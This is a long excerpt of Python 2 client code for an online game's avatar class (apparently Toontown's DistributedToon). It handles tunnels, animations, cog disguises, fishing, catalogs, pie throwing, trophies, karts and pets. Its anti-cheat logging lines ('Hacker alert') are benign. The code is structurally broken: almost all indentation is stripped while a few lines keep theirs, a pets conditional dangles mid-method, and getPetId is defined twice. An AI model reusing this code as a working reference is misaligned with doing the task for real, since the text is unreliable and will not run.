def d_setTunnelOut(self, timestamp, startX, startY, x, y, z, h):
self.sendUpdate('setTunnelOut', [timestamp,
startX,
startY,
x,
y,
z,
h])
def setTunnelOut(self, timestamp, startX, startY, x, y, z, h):
t = globalClockDelta.networkToLocalTime(timestamp)
self.handleTunnelOut(t, startX, startY, x, y, z, h)
def getTunnelOutToonTrack(self, startX, startY, tunnelOrigin):
startPos = self.getPos(tunnelOrigin)
startHpr = self.getHpr(tunnelOrigin)
reducedAvH = PythonUtil.fitDestAngle2Src(startHpr[0], 180)
pivotNode = tunnelOrigin.attachNewNode(self.uniqueName('pivotNode'))
pivotNode.setPos(*self.tunnelPivotPos)
pivotNode.setHpr(0, 0, 0)
pivotY = pivotNode.getY(tunnelOrigin)
straightLerpDur = abs(startY - pivotY) / ToonForwardSpeed
pivotDur = 2.0
pivotLerpDur = pivotDur * (90.0 / self.pivotAngle)
def getTargetPos(self=self):
pos = self.getPos()
return Point3(self.tunnelCenterOffset + (pos[0] - self.tunnelCenterOffset) * (1.0 - self.tunnelCenterInfluence), pos[1], pos[2])
return Sequence(Parallel(LerpPosInterval(self, straightLerpDur, pos=Point3(startX, pivotY, 0.1), startPos=startPos, other=tunnelOrigin, name=self.uniqueName('tunnelOutStraightLerp')), LerpHprInterval(self, straightLerpDur * 0.8, hpr=Point3(reducedAvH, 0, 0), startHpr=startHpr, other=tunnelOrigin, name=self.uniqueName('tunnelOutStraightLerpHpr'))), Func(self.wrtReparentTo, pivotNode), Parallel(LerpHprInterval(pivotNode, pivotDur, hpr=Point3(-self.pivotAngle, 0, 0), name=self.uniqueName('tunnelOutPivot')), LerpPosInterval(self, pivotLerpDur, pos=getTargetPos, name=self.uniqueName('tunnelOutPivotLerpPos'))), Func(self.wrtReparentTo, render), Func(pivotNode.removeNode))
def handleTunnelOut(self, startTime, startX, startY, x, y, z, h):
tunnelOrigin = render.attachNewNode('tunnelOrigin')
tunnelOrigin.setPosHpr(x, y, z, h, 0, 0)
self.tunnelTrack = Sequence(Func(self.stopSmooth), self.getTunnelOutToonTrack(startX, startY, tunnelOrigin), Func(self.detachNode), Func(tunnelOrigin.removeNode))
tOffset = globalClock.getFrameTime() - (startTime + self.smoother.getDelay())
if tOffset < 0.0:
self.tunnelTrack = Sequence(Wait(-tOffset), self.tunnelTrack)
self.tunnelTrack.start()
else:
self.tunnelTrack.start(tOffset)
def enterTeleportOut(self, *args, **kw):
Toon.Toon.enterTeleportOut(self, *args, **kw)
if self.track:
self.track.delayDelete = DelayDelete.DelayDelete(self, 'enterTeleportOut')
def exitTeleportOut(self):
if self.track != None:
DelayDelete.cleanupDelayDeletes(self.track)
Toon.Toon.exitTeleportOut(self)
return
def b_setAnimState(self, animName, animMultiplier=1.0, callback=None, extraArgs=[]):
self.d_setAnimState(animName, animMultiplier, None, extraArgs)
self.setAnimState(animName, animMultiplier, None, None, callback, extraArgs)
return
def d_setAnimState(self, animName, animMultiplier=1.0, timestamp=None, extraArgs=[]):
timestamp = globalClockDelta.getFrameNetworkTime()
self.sendUpdate('setAnimState', [animName, animMultiplier, timestamp])
def setAnimState(self, animName, animMultiplier=1.0, timestamp=None, animType=None, callback=None, extraArgs=[]):
if not animName or animName == 'None':
return
if timestamp == None:
ts = 0.0
else:
ts = globalClockDelta.localElapsedTime(timestamp)
if base.config.GetBool('check-invalid-anims', True):
if animMultiplier > 1.0 and animName in ('neutral', ):
animMultiplier = 1.0
if self.animFSM.getStateNamed(animName):
self.animFSM.request(animName, [animMultiplier,
ts,
callback,
extraArgs])
self.cleanupPieInHand()
return
def b_setEmoteState(self, animIndex, animMultiplier):
self.setEmoteState(animIndex, animMultiplier)
self.d_setEmoteState(animIndex, animMultiplier)
def d_setEmoteState(self, animIndex, animMultiplier):
timestamp = globalClockDelta.getFrameNetworkTime()
self.sendUpdate('setEmoteState', [animIndex, animMultiplier, timestamp])
def setEmoteState(self, animIndex, animMultiplier, timestamp=None):
if animIndex == TTEmote.EmoteClear:
return
else:
if timestamp == None:
ts = 0.0
else:
ts = globalClockDelta.localElapsedTime(timestamp)
callback = None
extraArgs = []
extraArgs.insert(0, animIndex)
self.doEmote(animIndex, animMultiplier, ts, callback, extraArgs)
return
def setCogStatus(self, cogStatusList):
self.cogs = cogStatusList
def setCogCount(self, cogCountList):
self.cogCounts = cogCountList
if hasattr(self, 'suitPage'):
self.suitPage.updatePage()
def setCogRadar(self, radar):
self.cogRadar = radar
if hasattr(self, 'suitPage'):
self.suitPage.updateCogRadarButtons(radar)
def setBuildingRadar(self, radar):
self.buildingRadar = radar
if hasattr(self, 'suitPage'):
self.suitPage.updateBuildingRadarButtons(radar)
def setCogTypes(self, types):
self.cogTypes = types
if self.disguisePage:
self.disguisePage.updatePage()
def setCogLevels(self, levels):
self.cogLevels = levels
if self.disguisePage:
self.disguisePage.updatePage()
def getCogLevels(self):
return self.cogLevels
def setCogParts(self, parts):
self.cogParts = parts
if self.disguisePage:
self.disguisePage.updatePage()
def getCogParts(self):
return self.cogParts
def setCogMerits(self, merits):
self.cogMerits = merits
if self.disguisePage:
self.disguisePage.updatePage()
def readyForPromotion(self, dept):
merits = base.localAvatar.cogMerits[dept]
totalMerits = CogDisguiseGlobals.getTotalMerits(self, dept)
if merits >= totalMerits:
return 1
else:
return 0
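    # A cogIndex of -1 clears any disguise; indices 0-3 pick the toon's
    # current suit within that cog department, and higher indices map to the
    # special suits in SuitDNA.extraSuitsIndex2Head.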
def setCogIndex(self, index, cogType=0):
self.cogIndex = (index, cogType)
if self.cogIndex[0] == -1:
if self.isDisguised:
self.takeOffSuit()
else:
if -1 <= index <= 3:
cogIndex = self.cogTypes[index] + SuitDNA.suitsPerDept * index
cog = SuitDNA.suitHeadTypes[cogIndex]
else:
cog = SuitDNA.extraSuitsIndex2Head.get(index)
if cogType in ToontownGlobals.PutOnSuitRental:
self.putOnSuit(index, cogType=cogType, rental=True)
else:
self.putOnSuit(cog, cogType=cogType)
def getCogIndex(self):
return self.cogIndex
def setCharIndex(self, index):
if index == -1:
if self.isClassicChar:
self.becomeToon()
else:
self.becomeChar(index)
def setTPose(self):
if self.isDisguised:
self.updateToonDNA(self.style, 1, True)
self.generateToonAccessories()
suitType = self.suit.style.name
cogType = self.isCog
if self.suit.isRental:
index = ToontownGlobals.CogDepts.index(self.suit.style.dept)
self.putOnSuit(suitType=index, setDisplayName=True, cogType=cogType, rental=True, tpose=True)
else:
self.putOnSuit(suitType=suitType, setDisplayName=True, cogType=cogType, tpose=True)
elif self.isClassicChar:
charType = CharDNA.charTypes.index(self.char.style.name)
self.becomeChar(charType, True)
else:
self.updateToonDNA(self.style, 1, True)
self.generateToonAccessories()
def setMuzzle(self, muzzle):
self.hideNormalMuzzle()
self.hideSurpriseMuzzle()
self.hideSadMuzzle()
self.hideSmileMuzzle()
self.hideAngryMuzzle()
self.hideLaughMuzzle()
if muzzle == 0:
self.showNormalMuzzle()
elif muzzle == 1:
self.showSurpriseMuzzle()
elif muzzle == 2:
self.showSadMuzzle()
elif muzzle == 3:
self.showSmileMuzzle()
elif muzzle == 4:
self.showAngryMuzzle()
elif muzzle == 5:
self.showLaughMuzzle()
def setEyes(self, eyes):
Toon.Toon.setEyes(self, eyes)
def isCog(self):
if self.cogIndex[0] == -1:
return 0
else:
return 1
def setDisguisePageFlag(self, flag):
if flag and hasattr(self, 'book'):
self.loadDisguisePages()
self.disguisePageFlag = flag
def setSosPageFlag(self, flag):
if flag and hasattr(self, 'book'):
self.loadSosPages()
self.sosPageFlag = flag
def setFishCollection(self, genusList, speciesList, weightList):
self.fishCollection = FishCollection.FishCollection()
self.fishCollection.makeFromNetLists(genusList, speciesList, weightList)
def getFishCollection(self):
return self.fishCollection
def setMaxFishTank(self, maxTank):
self.maxFishTank = maxTank
def getMaxFishTank(self):
return self.maxFishTank
def setFishTank(self, genusList, speciesList, weightList):
self.fishTank = FishTank.FishTank()
self.fishTank.makeFromNetLists(genusList, speciesList, weightList)
messenger.send(self.uniqueName('fishTankChange'))
def getFishTank(self):
return self.fishTank
def isFishTankFull(self):
return len(self.fishTank) >= self.maxFishTank
def setFishingRod(self, rodId):
self.fishingRod = rodId
def getFishingRod(self):
return self.fishingRod
def setFishingTrophies(self, trophyList):
self.fishingTrophies = trophyList
def getFishingTrophies(self):
return self.fishingTrophies
def setQuests(self, flattenedQuests):
questList = []
questLen = 5
for i in xrange(0, len(flattenedQuests), questLen):
questList.append(flattenedQuests[i:i + questLen])
self.quests = questList
if self == base.localAvatar:
messenger.send('questsChanged')
def setQuestCarryLimit(self, limit):
self.questCarryLimit = limit
if self == base.localAvatar:
messenger.send('questsChanged')
def getQuestCarryLimit(self):
return self.questCarryLimit
def d_requestDeleteQuest(self, questDesc):
self.sendUpdate('requestDeleteQuest', [list(questDesc)])
def setMaxCarry(self, maxCarry):
self.maxCarry = maxCarry
if self.inventory:
self.inventory.updateGUI()
def getMaxCarry(self):
return self.maxCarry
def setCheesyEffect(self, effect, hoodId, expireTime):
self.savedCheesyEffect = effect
self.savedCheesyHoodId = hoodId
self.savedCheesyExpireTime = expireTime
if self == base.localAvatar:
self.notify.debug('setCheesyEffect(%s, %s, %s)' % (effect, hoodId, expireTime))
if effect != ToontownGlobals.CENormal:
serverTime = time.time() + self.cr.getServerDelta()
duration = expireTime * 60 - serverTime
if duration < 0:
self.notify.debug('effect should have expired %s ago.' % PythonUtil.formatElapsedSeconds(-duration))
else:
self.notify.debug('effect will expire in %s.' % PythonUtil.formatElapsedSeconds(duration))
if self.activeState == DistributedObject.ESGenerated:
self.reconsiderCheesyEffect(lerpTime=0.5)
else:
self.reconsiderCheesyEffect()
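    # Work out which cheesy effect should actually be shown: effects are
    # suppressed where they are not allowed, a saved hoodId of 1 means
    # "everywhere except Toontown Central", any other nonzero hoodId limits
    # the effect to that neighborhood, and ghost mode always overrides.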
def reconsiderCheesyEffect(self, lerpTime=0):
effect = self.savedCheesyEffect
hoodId = self.savedCheesyHoodId
if not self.cr.areCheesyEffectsAllowed():
effect = CENormal
if hoodId != 0:
try:
currentHoodId = base.cr.playGame.hood.id
except:
currentHoodId = None
if hoodId == 1:
if currentHoodId == ToontownGlobals.ToontownCentral:
effect = CENormal
elif currentHoodId != None and currentHoodId != hoodId:
effect = CENormal
if self.ghostMode:
effect = CEGhost
self.applyCheesyEffect(effect, lerpTime=lerpTime)
return
def setGhostMode(self, flag):
if self.ghostMode != flag:
self.ghostMode = flag
if not hasattr(self, 'cr'):
return
if self.activeState <= DistributedObject.ESDisabled:
self.notify.debug('not applying cheesy effect to disabled Toon')
elif self.activeState == DistributedObject.ESGenerating:
self.reconsiderCheesyEffect()
elif self.activeState == DistributedObject.ESGenerated:
self.reconsiderCheesyEffect(lerpTime=0.5)
else:
self.notify.warning('unknown activeState: %s' % self.activeState)
self.showNametag2d()
self.showNametag3d()
if hasattr(self, 'collNode'):
if self.ghostMode:
self.collNode.setCollideMask(ToontownGlobals.GhostBitmask)
else:
self.collNode.setCollideMask(ToontownGlobals.WallBitmask | ToontownGlobals.PieBitmask)
if self.isLocal():
if self.ghostMode:
self.useGhostControls()
else:
self.useWalkControls()
if hasattr(base, 'wantPets') and base.wantPets:
def setPetTrickPhrases(self, petTricks):
self.petTrickPhrases = petTricks
if self.isLocal():
messenger.send('petTrickPhrasesChanged')
def setCustomMessages(self, customMessages):
self.customMessages = customMessages
if self.isLocal():
messenger.send('customMessagesChanged')
def setResistanceMessages(self, resistanceMessages):
self.resistanceMessages = resistanceMessages
if self.isLocal():
messenger.send('resistanceMessagesChanged')
def getResistanceMessageCharges(self, textId):
msgs = self.resistanceMessages
for i in xrange(len(msgs)):
if msgs[i][0] == textId:
return msgs[i][1]
return 0
def setCatalogSchedule(self, currentWeek, nextTime):
self.catalogScheduleCurrentWeek = currentWeek
self.catalogScheduleNextTime = nextTime
if self.isLocal():
self.notify.debug('setCatalogSchedule(%s, %s)' % (currentWeek, nextTime))
if nextTime:
serverTime = time.time() + self.cr.getServerDelta()
duration = nextTime * 60 - serverTime
self.notify.debug('next catalog in %s.' % PythonUtil.formatElapsedSeconds(duration))
def setCatalog(self, monthlyCatalog, weeklyCatalog, backCatalog):
self.monthlyCatalog = CatalogItemList.CatalogItemList(monthlyCatalog)
self.weeklyCatalog = CatalogItemList.CatalogItemList(weeklyCatalog)
self.backCatalog = CatalogItemList.CatalogItemList(backCatalog)
if self.catalogNotify == ToontownGlobals.NewItems:
self.catalogNotify = ToontownGlobals.OldItems
def setCatalogNotify(self, catalogNotify, mailboxNotify):
if len(self.weeklyCatalog) + len(self.monthlyCatalog) == 0:
catalogNotify = ToontownGlobals.NoItems
if len(self.mailboxContents) == 0:
mailboxNotify = ToontownGlobals.NoItems
self.catalogNotify = catalogNotify
self.mailboxNotify = mailboxNotify
if self.isLocal():
self.gotCatalogNotify = 1
self.refreshOnscreenButtons()
print 'local'
def setDeliverySchedule(self, onOrder):
self.onOrder = CatalogItemList.CatalogItemList(onOrder, store=CatalogItem.Customization | CatalogItem.DeliveryDate)
if self == base.localAvatar:
nextTime = self.onOrder.getNextDeliveryDate()
if nextTime != None:
serverTime = time.time() + self.cr.getServerDelta()
duration = nextTime * 60 - serverTime
self.notify.debug('next delivery in %s.' % PythonUtil.formatElapsedSeconds(duration))
messenger.send('setDeliverySchedule-%s' % self.doId)
return
def setMailboxContents(self, mailboxContents):
self.mailboxContents = CatalogItemList.CatalogItemList(mailboxContents, store=CatalogItem.Customization)
messenger.send('setMailboxContents-%s' % self.doId)
def setAwardSchedule(self, onOrder):
self.onAwardOrder = CatalogItemList.CatalogItemList(onOrder, store=CatalogItem.Customization | CatalogItem.DeliveryDate)
if self == base.localAvatar:
nextTime = self.onAwardOrder.getNextDeliveryDate()
if nextTime != None:
serverTime = time.time() + self.cr.getServerDelta()
duration = nextTime * 60 - serverTime
self.notify.debug('next delivery in %s.' % PythonUtil.formatElapsedSeconds(duration))
messenger.send('setAwardSchedule-%s' % self.doId)
return
def setAwardMailboxContents(self, awardMailboxContents):
self.notify.debug('Setting awardMailboxContents to %s.' % awardMailboxContents)
self.awardMailboxContents = CatalogItemList.CatalogItemList(awardMailboxContents, store=CatalogItem.Customization)
self.notify.debug('awardMailboxContents is %s.' % self.awardMailboxContents)
messenger.send('setAwardMailboxContents-%s' % self.doId)
def setAwardNotify(self, awardNotify):
self.notify.debug('setAwardNotify( %s )' % awardNotify)
self.awardNotify = awardNotify
if self.isLocal():
self.gotCatalogNotify = 1
self.refreshOnscreenButtons()
def setGiftSchedule(self, onGiftOrder):
self.onGiftOrder = CatalogItemList.CatalogItemList(onGiftOrder, store=CatalogItem.Customization | CatalogItem.DeliveryDate)
if self == base.localAvatar:
nextTime = self.onGiftOrder.getNextDeliveryDate()
if nextTime != None:
serverTime = time.time() + self.cr.getServerDelta()
duration = nextTime * 60 - serverTime
self.notify.debug('next delivery in %s.' % PythonUtil.formatElapsedSeconds(duration))
return
def playSplashEffect(self, x, y, z):
if localAvatar.zoneId not in [ToontownGlobals.DonaldsDock, ToontownGlobals.OutdoorZone] and (not hasattr(localAvatar, 'inEstate') or localAvatar.inEstate != 1):
if random.random() < 0.1:
self.sendLogSuspiciousEvent('AvatarHackWarning! playing hacked splash effect')
return
from toontown.effects import Splash
if self.splash == None:
self.splash = Splash.Splash(render)
self.splash.setPos(x, y, z)
self.splash.setScale(2)
self.splash.play()
place = base.cr.playGame.getPlace()
if place:
if hasattr(place.loader, 'submergeSound'):
base.playSfx(place.loader.submergeSound, node=self)
return
def d_playSplashEffect(self, x, y, z):
self.sendUpdate('playSplashEffect', [x, y, z])
def setTrackAccess(self, trackArray):
self.trackArray = trackArray
if self.inventory:
self.inventory.updateGUI()
def getTrackAccess(self):
return self.trackArray
def hasTrackAccess(self, track):
return self.trackArray[track]
def setTrackProgress(self, trackId, progress):
self.trackProgressId = trackId
self.trackProgress = progress
if hasattr(self, 'trackPage'):
self.trackPage.updatePage()
def getTrackProgress(self):
return [
self.trackProgressId, self.trackProgress]
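    # Unpack the trackProgress bitmask into a list of 0/1 flags,
    # least-significant bit first.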
def getTrackProgressAsArray(self, maxLength=15):
shifts = map(operator.rshift, maxLength * [self.trackProgress], xrange(maxLength - 1, -1, -1))
digits = map(operator.mod, shifts, maxLength * [2])
digits.reverse()
return digits
def setTeleportAccess(self, teleportZoneArray):
self.teleportZoneArray = teleportZoneArray
def getTeleportAccess(self):
return self.teleportZoneArray
def hasTeleportAccess(self, zoneId):
return zoneId in self.teleportZoneArray
def setQuestHistory(self, questList):
self.questHistory = questList
def getQuestHistory(self):
return self.questHistory
def setRewardHistory(self, rewardTier, rewardList):
self.rewardTier = rewardTier
self.rewardHistory = rewardList
def getRewardHistory(self):
return (
self.rewardTier, self.rewardHistory)
def doSmoothTask(self, task):
self.smoother.computeAndApplySmoothPosHpr(self, self)
self.setSpeed(self.smoother.getSmoothForwardVelocity(), self.smoother.getSmoothRotationalVelocity())
return Task.cont
def d_setParent(self, parentToken):
DistributedSmoothNode.DistributedSmoothNode.d_setParent(self, parentToken)
def setEmoteAccess(self, bits):
self.emoteAccess = bits
if self == base.localAvatar:
messenger.send('emotesChanged')
def b_setHouseId(self, id):
self.setHouseId(id)
self.d_setHouseId(id)
def d_setHouseId(self, id):
self.sendUpdate('setHouseId', [id])
def setHouseId(self, id):
self.houseId = id
def getHouseId(self):
return self.houseId
def setPosIndex(self, index):
self.posIndex = index
def getPosIndex(self):
return self.posIndex
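    # Validate the requested SpeedChat style index before applying or
    # broadcasting it; out-of-range values are logged as a possible hacked
    # client and fall back to index 0.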
def b_setSpeedChatStyleIndex(self, index):
realIndexToSend = 0
if type(index) == type(0) and 0 <= index and index < len(speedChatStyles):
realIndexToSend = index
else:
base.cr.centralLogger.writeClientEvent('Hacker alert b_setSpeedChatStyleIndex invalid')
self.setSpeedChatStyleIndex(realIndexToSend)
self.d_setSpeedChatStyleIndex(realIndexToSend)
return
def d_setSpeedChatStyleIndex(self, index):
realIndexToSend = 0
if type(index) == type(0) and 0 <= index and index < len(speedChatStyles):
realIndexToSend = index
else:
base.cr.centralLogger.writeClientEvent('Hacker alert d_setSpeedChatStyleIndex invalid')
self.sendUpdate('setSpeedChatStyleIndex', [realIndexToSend])
def setSpeedChatStyleIndex(self, index):
realIndexToUse = 0
if type(index) == type(0) and 0 <= index and index < len(speedChatStyles):
realIndexToUse = index
else:
base.cr.centralLogger.writeClientEvent('Hacker victim setSpeedChatStyleIndex invalid attacking toon = %d' % self.doId)
self.speedChatStyleIndex = realIndexToUse
nameKey, arrowColor, rolloverColor, frameColor = speedChatStyles[realIndexToUse]
self.nametag.setQtColor(VBase4(frameColor[0], frameColor[1], frameColor[2], 1))
if self.isLocal():
messenger.send('SpeedChatStyleChange', [])
def getSpeedChatStyleIndex(self):
return self.speedChatStyleIndex
def setMaxMoney(self, maxMoney):
self.maxMoney = maxMoney
def getMaxMoney(self):
return self.maxMoney
def setMoney(self, money):
if money != self.money:
self.money = money
messenger.send(self.uniqueName('moneyChange'), [self.money])
def getMoney(self):
return self.money
def setMaxBankMoney(self, maxMoney):
self.maxBankMoney = maxMoney
def getMaxBankMoney(self):
return self.maxBankMoney
def setBankMoney(self, money):
self.bankMoney = money
messenger.send(self.uniqueName('bankMoneyChange'), [self.bankMoney])
def getBankMoney(self):
return self.bankMoney
def getTotalMoney(self):
return self.getBankMoney() + self.getMoney()
def setEmblems(self, emblems):
if self.emblems != emblems:
self.emblems = emblems
messenger.send(self.uniqueName('emblemsChange'), [self.emblems])
def getEmblems(self):
return self.emblems
def isEnoughEmblemsToBuy(self, itemEmblemPrices):
for emblemIndex, emblemPrice in enumerate(itemEmblemPrices):
if emblemIndex >= len(self.emblems):
return False
if self.emblems[emblemIndex] < emblemPrice:
return False
return True
def isEnoughMoneyAndEmblemsToBuy(self, moneyPrice, itemEmblemPrices):
if self.getTotalMoney() < moneyPrice:
return False
for emblemIndex, emblemPrice in enumerate(itemEmblemPrices):
if emblemIndex >= len(self.emblems):
return False
if self.emblems[emblemIndex] < emblemPrice:
return False
return True
def presentPie(self, x, y, z, h, p, r, timestamp32):
if self.numPies <= 0:
return
else:
if not launcher.getPhaseComplete(5):
return
lastTossTrack = Sequence()
if self.tossTrack:
lastTossTrack = self.tossTrack
tossTrack = None
ts = globalClockDelta.localElapsedTime(timestamp32, bits=32)
ts -= self.smoother.getDelay()
ival = self.getPresentPieInterval(x, y, z, h, p, r)
if ts > 0:
startTime = ts
lastTossTrack.finish()
else:
ival = Sequence(Wait(-ts), ival)
lastTossTrack.finish()
startTime = 0
ival = Sequence(ival)
ival.start(startTime)
self.tossTrack = ival
return
def tossPie(self, x, y, z, h, p, r, sequence, power, timestamp32):
if self.numPies <= 0:
return
else:
if self.numPies != ToontownGlobals.FullPies:
self.setNumPies(self.numPies - 1)
self.lastTossedPie = globalClock.getFrameTime()
if not launcher.getPhaseComplete(5):
return
lastTossTrack = Sequence()
if self.tossTrack:
lastTossTrack = self.tossTrack
tossTrack = None
lastPieTrack = Sequence()
if sequence in self.pieTracks:
lastPieTrack = self.pieTracks[sequence]
del self.pieTracks[sequence]
ts = globalClockDelta.localElapsedTime(timestamp32, bits=32)
ts -= self.smoother.getDelay()
toss, pie, flyPie = self.getTossPieInterval(x, y, z, h, p, r, power)
if ts > 0:
startTime = ts
lastTossTrack.finish()
lastPieTrack.finish()
else:
toss = Sequence(Wait(-ts), toss)
pie = Sequence(Wait(-ts), pie)
lastTossTrack.finish()
lastPieTrack.finish()
startTime = 0
self.tossTrack = toss
toss.start(startTime)
pie = Sequence(pie, Func(self.pieFinishedFlying, sequence))
self.pieTracks[sequence] = pie
pie.start(startTime)
return
def pieFinishedFlying(self, sequence):
if sequence in self.pieTracks:
del self.pieTracks[sequence]
def pieFinishedSplatting(self, sequence):
if sequence in self.splatTracks:
del self.splatTracks[sequence]
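    # Play the splat effect for a pie this toon threw. Splats for the local
    # toon are skipped here, and tosses older than 30 seconds are treated as
    # stale and ignored.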
def pieSplat(self, x, y, z, sequence, pieCode, timestamp32):
if self.isLocal():
return
elapsed = globalClock.getFrameTime() - self.lastTossedPie
if elapsed > 30:
return
if not launcher.getPhaseComplete(5):
return
lastPieTrack = Sequence()
if sequence in self.pieTracks:
lastPieTrack = self.pieTracks[sequence]
del self.pieTracks[sequence]
if sequence in self.splatTracks:
lastSplatTrack = self.splatTracks[sequence]
del self.splatTracks[sequence]
lastSplatTrack.finish()
ts = globalClockDelta.localElapsedTime(timestamp32, bits=32)
ts -= self.smoother.getDelay()
splat = self.getPieSplatInterval(x, y, z, pieCode)
splat = Sequence(Func(messenger.send, 'pieSplat', [self, pieCode]), splat)
if ts > 0:
startTime = ts
lastPieTrack.finish()
else:
splat = Sequence(Wait(-ts), splat)
startTime = 0
splat = Sequence(splat, Func(self.pieFinishedSplatting, sequence))
self.splatTracks[sequence] = splat
splat.start(startTime)
def cleanupPies(self):
for track in self.pieTracks.values():
track.finish()
self.pieTracks = {}
for track in self.splatTracks.values():
track.finish()
self.splatTracks = {}
self.cleanupPieInHand()
def cleanupPieInHand(self):
if self.tossTrack:
self.tossTrack.finish()
self.tossTrack = None
self.cleanupPieModel()
return
def setNumPies(self, numPies):
self.numPies = numPies
if self.isLocal():
self.updatePieButton()
if numPies == 0:
self.interruptPie()
def setPieType(self, pieType):
self.pieType = pieType
if self.isLocal():
self.updatePieButton()
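    # Show a star above the nametag once the trophy score crosses the levels
    # in ToontownGlobals.TrophyStarLevels; higher tiers recolor the star and
    # the upper level of each pair makes it spin.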
def setTrophyScore(self, score):
self.trophyScore = score
if self.trophyStar != None:
self.trophyStar.removeNode()
self.trophyStar = None
if self.trophyStarSpeed != 0:
taskMgr.remove(self.uniqueName('starSpin'))
self.trophyStarSpeed = 0
if hasattr(self, 'gmIcon') and self.gmIcon:
return
else:
if self.trophyScore >= ToontownGlobals.TrophyStarLevels[4]:
self.trophyStar = loader.loadModel('phase_3.5/models/gui/name_star')
self.trophyStar.reparentTo(self.nametag.getNameIcon())
self.trophyStar.setScale(2)
self.trophyStar.setZ(2)
self.trophyStar.setColor(ToontownGlobals.TrophyStarColors[4])
self.trophyStarSpeed = 15
if self.trophyScore >= ToontownGlobals.TrophyStarLevels[5]:
taskMgr.add(self.__starSpin, self.uniqueName('starSpin'))
elif self.trophyScore >= ToontownGlobals.TrophyStarLevels[2]:
self.trophyStar = loader.loadModel('phase_3.5/models/gui/name_star')
self.trophyStar.reparentTo(self.nametag.getNameIcon())
self.trophyStar.setScale(1.5)
self.trophyStar.setZ(1.6)
self.trophyStar.setColor(ToontownGlobals.TrophyStarColors[2])
self.trophyStarSpeed = 10
if self.trophyScore >= ToontownGlobals.TrophyStarLevels[3]:
taskMgr.add(self.__starSpin, self.uniqueName('starSpin'))
elif self.trophyScore >= ToontownGlobals.TrophyStarLevels[0]:
self.trophyStar = loader.loadModel('phase_3.5/models/gui/name_star')
self.trophyStar.reparentTo(self.nametag.getNameIcon())
self.trophyStar.setScale(1.5)
self.trophyStar.setZ(1.6)
self.trophyStar.setColor(ToontownGlobals.TrophyStarColors[0])
self.trophyStarSpeed = 8
if self.trophyScore >= ToontownGlobals.TrophyStarLevels[1]:
taskMgr.add(self.__starSpin, self.uniqueName('starSpin'))
return
def __starSpin(self, task):
now = globalClock.getFrameTime()
r = now * self.trophyStarSpeed % 360.0
self.trophyStar.setR(r)
return Task.cont
    def getZoneId(self):
        place = base.cr.playGame.getPlace()
        if place:
            return place.getZoneId()
        return None
def getRequestID(self):
return CLIENT_GET_AVATAR_DETAILS
def announceBingo(self):
self.setChatAbsolute(TTLocalizer.FishBingoBingo, CFSpeech | CFTimeout)
def squish(self, damage, noAnim=False):
if self == base.localAvatar:
if not noAnim:
base.cr.playGame.getPlace().fsm.request('squished')
self.stunToon()
self.setZ(self.getZ(render) + 0.025)
def d_squish(self, damage):
self.sendUpdate('squish', [damage])
def b_squish(self, damage, noAnim=False):
if not self.isStunned:
self.squish(damage, noAnim)
self.d_squish(damage)
self.playDialogueForString('!')
def getShadowJoint(self):
return Toon.Toon.getShadowJoint(self)
if base.wantKarts:
def hasKart(self):
return self.kartDNA[KartDNA.bodyType] != -1
def getKartDNA(self):
return self.kartDNA
def setTickets(self, numTickets):
self.tickets = numTickets
def getTickets(self):
return self.tickets
def getAccessoryByType(self, accType):
return self.kartDNA[accType]
def setCurrentKart(self, avId):
self.kartId = avId
def releaseKart(self):
self.kartId = None
return
def setKartBodyType(self, bodyType):
self.kartDNA[KartDNA.bodyType] = bodyType
def getKartBodyType(self):
return self.kartDNA[KartDNA.bodyType]
def setKartBodyColor(self, bodyColor):
self.kartDNA[KartDNA.bodyColor] = bodyColor
def getKartBodyColor(self):
return self.kartDNA[KartDNA.bodyColor]
def setKartAccessoryColor(self, accColor):
self.kartDNA[KartDNA.accColor] = accColor
def getKartAccessoryColor(self):
return self.kartDNA[KartDNA.accColor]
def setKartEngineBlockType(self, ebType):
self.kartDNA[KartDNA.ebType] = ebType
def getKartEngineBlockType(self):
return self.kartDNA[KartDNA.ebType]
def setKartSpoilerType(self, spType):
self.kartDNA[KartDNA.spType] = spType
def getKartSpoilerType(self):
return self.kartDNA[KartDNA.spType]
def setKartFrontWheelWellType(self, fwwType):
self.kartDNA[KartDNA.fwwType] = fwwType
def getKartFrontWheelWellType(self):
return self.kartDNA[KartDNA.fwwType]
def setKartBackWheelWellType(self, bwwType):
self.kartDNA[KartDNA.bwwType] = bwwType
def getKartBackWheelWellType(self):
return self.kartDNA[KartDNA.bwwType]
def setKartRimType(self, rimsType):
self.kartDNA[KartDNA.rimsType] = rimsType
def setKartDecalType(self, decalType):
self.kartDNA[KartDNA.decalType] = decalType
def getKartDecalType(self):
return self.kartDNA[KartDNA.decalType]
def getKartRimType(self):
return self.kartDNA[KartDNA.rimsType]
def setKartAccessoriesOwned(self, accessories):
while len(accessories) < 16:
accessories.append(-1)
self.accessories = accessories
def getKartAccessoriesOwned(self):
owned = copy.deepcopy(self.accessories)
while InvalidEntry in owned:
owned.remove(InvalidEntry)
return owned
def requestKartDNAFieldUpdate(self, dnaField, fieldValue):
self.notify.debug('requestKartDNAFieldUpdate - dnaField %s, fieldValue %s' % (dnaField, fieldValue))
self.sendUpdate('updateKartDNAField', [dnaField, fieldValue])
def requestAddOwnedAccessory(self, accessoryId):
            self.notify.debug('requestAddOwnedAccessory - purchased accessory %s' % accessoryId)
self.sendUpdate('addOwnedAccessory', [accessoryId])
def requestRemoveOwnedAccessory(self, accessoryId):
            self.notify.debug('requestRemoveOwnedAccessory - removed accessory %s' % accessoryId)
self.sendUpdate('removeOwnedAccessory', [accessoryId])
def setKartingTrophies(self, trophyList):
self.kartingTrophies = trophyList
def getKartingTrophies(self):
return self.kartingTrophies
def setKartingHistory(self, history):
self.kartingHistory = history
def getKartingHistory(self):
return self.kartingHistory
def setKartingPersonalBest(self, bestTimes):
self.kartingPersonalBest = bestTimes
def getKartingPersonalBest(self):
return self.kartingPersonalBest
def setKartingPersonalBest2(self, bestTimes2):
self.kartingPersonalBest2 = bestTimes2
def getKartingPersonalBest2(self):
return self.kartingPersonalBest2
def getKartingPersonalBestAll(self):
return self.kartingPersonalBest + self.kartingPersonalBest2
if hasattr(base, 'wantPets') and base.wantPets:
def setPetId(self, petId):
self.petId = petId
if petId == 0:
self.petDNA = None
elif self.isLocal():
base.cr.addPetToFriendsMap()
return
def getPetId(self):
return self.petId
def getPetId(self):
return self.petId
def hasPet(self):
return self.petId != 0
def b_setPetTutorialDone(self, bDone):
self.d_setPetTutorialDone(bDone)
self.setPetTutorialDone(bDone)
def d_setPetTutorialDone(self, bDone):
self.sendUpdate('setPetTutorialDone', [bDone])
def setPetTutorialDone(self, bDone):
self.bPetTutorialDone = bDone
